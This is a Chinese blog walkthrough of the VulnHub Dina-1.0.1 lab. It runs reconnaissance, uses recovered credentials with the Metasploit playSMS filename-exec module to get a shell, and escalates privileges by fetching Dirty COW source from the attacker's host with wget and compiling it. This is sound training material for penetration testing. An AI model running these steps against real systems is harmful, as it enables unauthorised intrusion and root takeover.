Vulhub靶场之Dina-1.0.1

最新推荐文章于 2023-03-05 23:05:54 发布
最新推荐文章于 2023-03-05 23:05:54 发布
阅读量737 收藏 4
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650977/article/details/116298340
版权

Vulhub靶场之Dina-1.0.1

靶机描述

ctf类的靶机,目标是获取/root/flag.txt

环境准备

vmware15 打开
攻击机:kali   NAT模式 10.10.10.128
靶机:Dina1.0.1		NAT模式  10.10.10.144

解题过程

1、nmap扫描获取存活主机
nmap -sP 10.10.10.0/24
靶机IP:10.10.10.144
2、nmap扫描获取靶机信息
nmap -sV -O 10.10.10.144
开放了80端口、linux内核版本在2.6.32-3.5
开放了80端口
3、按照惯例,查看robots.txt
在这里插入图片描述
4、对robots里的内容逐一查看并查看源码,发现nothing源码内有类似密码的东西
在这里插入图片描述
在这里插入图片描述

5、打开web,使用dirsearch对该web后台进行扫描
python3 dirsearch.py -u http://10.10.10.144


在这里插入图片描述
6、分别查看http://10.10.10.144/uploads/、http://10.10.10.144/tmp/、http://10.10.10.144/secure,发现secure中有backup.zip压缩包
在这里插入图片描述
7、将其下载下来,发现里面是一个mp3格式的文件,解压需要密码
在这里插入图片描述
8、使用nothing中获取到的源码逐一尝试(freedom为正确密码),解压完后发现,以mp3格式打开报错,于是尝试010editor打开,发现一串内容。
在这里插入图片描述
提示三个信息:
(1)密码是简单密码,与creds backup file有关
(2)用户名是touhid
(3)一段URL:/SecreTSMSgatwayLogin

9、打开该URL,是一个playsms类型的网站的登录界面,尝试使用用户名touhid,密码是nothing源码提示的密码(密码为diana),登陆成功
在这里插入图片描述
10、寻找文件上传点等漏洞,尝试能否传马。
在这里插入图片描述
11、或者直接msf利用playsms的相关攻击模块,并设置相关参数

search playsms
use exploit/multi/http/playsms_filename_exec   
show options
set rhosts 10.10.10.144
set targeturi /SecreTSMSgatwayLogin
set username touhid
set password diana
set lhost 10.10.10.128

在这里插入图片描述
12、执行成功后,获得meterpreter通道,进入shell,需要设置虚拟终端

python -c "import pty;pty.spawn('/bin/bash');"  #linux系统的终端(信息收集时知道靶机是linux系统)

在这里插入图片描述
13、此时,获得的是普通的web账户的权限,需要进行提权。
这里因为前期信息收集已知linux内核版本是2.6-3.5的,因此尝试脏牛提权。

wget http://10.10.10.128/dirty.c  #开启kali的apache服务,通过wget的方式下载脏牛源文件
service apache2 start #开启kali apache,将源文件放到网站根目录下

14、发现当前目录下没有权限读写下载文件,于是在其他目录上下载,比如tmp目录
在这里插入图片描述
在这里插入图片描述
15、编译该文件,并执行

gcc -pthread dirty.c -o dirty -lcrypt

在这里插入图片描述在这里插入图片描述
16、切换成管理员用户firefart,并获取flag.txt文件
在这里插入图片描述
在这里插入图片描述

DiDD
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dina-mediaserver
06-25
================ DINA-WEB - 媒体服务器模块 Mediaserver 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml 文件中...
靶机实战-Dina 1.0
滕财然的博客
01-28 1079
Dina 1.0靶机实战 文章目录Dina 1.0靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、提权提权方式二 1、主机发现 目标IP:192.168.232.157 2、端口扫描 3、端口详细信息扫描 只开放80端口 4、访问80端口–http服务 主页啥都没有,直接dirb扫一下目录 依次访问目录: index就是主页,就不看了 发现robo...
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 396
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 785
靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
靶机:Quaoar
AzVoidSUN的博客
06-23 677
运行环境 本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运 行。 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。 开始 首先查看本机ip 192.168.1.25 nmap扫一下网段 发现主机 访问下80端口 扫描下目录 发现后台登陆的地方 弱口令admin登陆成功 点击修改404界面 我直接把php反弹she
dina-mediaserver-demo
07-07
================ DINA-WEB : MediaServer-Demo MediaServer-Demo 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml...
dina-2021:我为2021年Dina生日创作的拼图
04-08
狄娜2021 我为迪娜(Dina)2021年生日做的一个项目该项目是通过引导的。
dina-frontend-assessment-react:使用 React 进行前端评估的解决方案
07-01
数字原住民的 JS 评估 - React.js解决方案评估的每个部分的解决方案可以在不同的分支中找到。跑步您的计算机上必须安装了 。 从根项目目录从命令行运行这些命令: npm install 这将安装所有依赖项。...
Dina Translator-开源
07-03
Dina 是 Windows 的翻译器,可以在大多数应用程序中快速翻译文本,例如 Web 浏览器、游戏、Office 应用程序、Messenger 等。该软件随时使用“在线连接”。 因此,它是翻译的先决条件。 合法访问:软件免费版本未获得...
CTF之命令注入(Dina 1.0
afei001
04-01 542
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
Vulhub vulnUni:1.0.1
hee_mee的博客
04-24 423
NilZero
vulhub - CH4INRULZ_v1.0.1 writeup
Jiajiajiang_的博客
04-01 1403
主机来源:www.vulnhub.com 下载链接:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 准备工作: 下载.ova文件,直接双击即可安装成功 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 简介下netdiscover的用法...
Dina靶机渗透
weixin_44769042的博客
10-10 455
挺有意思的一个靶机 目录 主机发现 端口扫描 目录扫描 去web端看看,开始渗透 反弹shell 方法1 方法2 提权 尝试1-失败 尝试2-脏牛提权-成功 主机发现 netdiscover -i eth0 -r 192.168.129.0/24 端口扫描 扫描端口的服务版本,服务器操作系统,中间件等信息 目录扫描 去web端看看,开始渗透 看了看页面也没啥有用信息 一个提交信息 只是爆出服务器中间件版本然后也不能操作什么 还有一个链.
【B2R】DINA1.0.1
qq_44339430的博客
03-24 358
【B2R】DINA:1.0.1 靶场地址:https://www.vulnhub.com/entry/dina-101,200/ 靶场信息 靶场描述 Description Back to the Top Welcome to Dina 1.0.1 ________ _________ \________\--------___ ___ ____----------/______
DINA靶场渗透测试(保姆级超详细!!)
m0_57867209的博客
03-05 172
关于DINA靶场渗透测试的保姆级详细教程
靶机记录(一):Dina
weixin_47306547的博客
10-29 187
目录 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门
靶机测试--Dina
ximo的博客
03-28 281
目录信息收集主机发现端口扫描目录扫描漏洞发掘提权总结 信息收集 主机发现 端口扫描 只有80端口: 目录扫描 访问每一个可以访问的路径: 主页: nothing/pass: secure/: 漏洞发掘 得到了一个类似密码字典,一个zip文件。 下载zip文件: 需要密码,使用获得的密码freedom,解压后为mp3格式,但是无法播放: 使用文本打开: 获得了用户名和一个后台,打开: 使用diana可以成功登录: 网站框架为playsms。 搜索CMS漏洞: 有三个属于msf,使用msf
kali渗透综合靶机(十三)--Dina 1.0靶机
WY92139010的博客
06-03 659
kali渗透综合靶机(十三)--Dina 1.0靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.181    三、端口服务识别 1. nmap -sV -T4 -O -p ,80 192.168.10.181 ...
DINA模型(独立属性模型)的原理
最新发布
04-10
DINA模型是一种基于Item Response Theory (IRT)的测量模型,它用于评估测试者在某个认知领域内是否具有特定的技能或能力。DINA模型通过考察每个测试项(题目)中哪些技能或者能力是必须的以及被测试者所表现出的技能或能力情况,从而确定测试者的能力水平。简单来说,DINA模型通过分析测试项与测试者之间的关系,得出测试者在特定认知领域内的能力水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值